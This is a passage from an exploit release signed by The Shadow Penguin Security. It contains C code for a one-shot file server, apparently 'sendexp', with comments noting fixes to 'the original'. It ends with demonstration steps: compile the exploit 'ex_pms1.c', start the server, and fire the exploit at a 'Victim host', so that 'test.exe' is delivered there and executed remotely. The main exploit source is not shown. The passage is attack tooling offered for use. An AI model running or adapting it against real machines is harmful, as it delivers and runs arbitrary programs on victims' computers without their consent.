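    if (setsockopt(listening_socket, SOL_SOCKET, SO_REUSEADDR,
                   &reuse_addr, sizeof reuse_addr) < 0) {
        perror("setsockopt");
    }
    if (bind(listening_socket, (struct sockaddr *)&address, sizeof address) < 0) {
        perror("bind");
        exit(1);
    }
    /* The original ignored listen() failures, which then surfaced as a failed accept(). */
    if (listen(listening_socket, 5) < 0) {
        perror("listen");
        exit(1);
    }
    int connected_socket = accept(listening_socket, (struct sockaddr *)&acc, &acclen);
    if (connected_socket < 0) {
        perror("accept");   /* caller sees -1 and must not write to it */
    }
    return connected_socket;
}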
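/*
 * Write all `len` bytes of `data` to `fd`, retrying after short writes and
 * EINTR. Returns 0 on success, -1 on error (errno set by write()).
 */
static int write_all(int fd, const char *data, size_t len)
{
    while (len > 0) {
        ssize_t n = write(fd, data, len);
        if (n < 0) {
            if (errno == EINTR) {
                continue;
            }
            return -1;
        }
        data += n;
        len -= (size_t)n;
    }
    return 0;
}

/*
 * Serve SENDFILE once: wait for a single TCP client on PORT_NUM, stream the
 * whole file to it and exit.
 *
 * argc/argv are unused; the file name and port are compile-time constants.
 * Returns 0 on success, 1 if the file cannot be opened (exit status 1, as
 * before) or no client could be accepted, 2 if the transfer failed part-way.
 * The original ignored short/failed write() results and never closed the
 * listening socket; both are handled here.
 */
int main(int argc, char *argv[])
{
    (void)argc;
    (void)argv;

    FILE *fp = fopen(SENDFILE, "rb");
    if (fp == NULL) {
        printf("File not found \"%s\"\n", SENDFILE);
        exit(1);
    }

    int listensock = -1;
    int sock = get_connection(PORT_NUM, &listensock);
    if (sock < 0) {
        fclose(fp);
        if (listensock >= 0) {
            close(listensock);
        }
        return 1;
    }

    int rc = 0;
    char buf[BUFSIZE];
    size_t l;
    /* fread() returns 0 at EOF or on error; ferror() distinguishes the two below. */
    while ((l = fread(buf, 1, sizeof buf, fp)) > 0) {
        if (write_all(sock, buf, l) < 0) {
            perror("write");
            rc = 2;
            break;
        }
    }
    if (rc == 0 && ferror(fp)) {
        perror("fread");
        rc = 2;
    }

    fclose(fp);
    close(sock);
    if (listensock >= 0) {
        close(listensock);
    }
    return rc;
}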
  
  
<< Demonstration >>  
  
  
Victim host : 192.168.200.200  
Your host : 192.168.100.100  
  
  
(1) Copy your test program "test.exe" to the UNIX machine.  
(2) gcc ex_pms1.c -o pms1  
(3) gcc sendexp.c -o sendexp  
(4) ./sendexp &  
(5) ./pms1 192.168.200.200 192.168.100.100  
  
  
You can send "test.exe" to the victim host and execute it remotely.  
The size of "test.exe" is not limited.  
  
  
-----  
The Shadow Penguin Security (http://shadowpenguin.backsection.net)  
Webmaster / UNYUN ([email protected])  
`
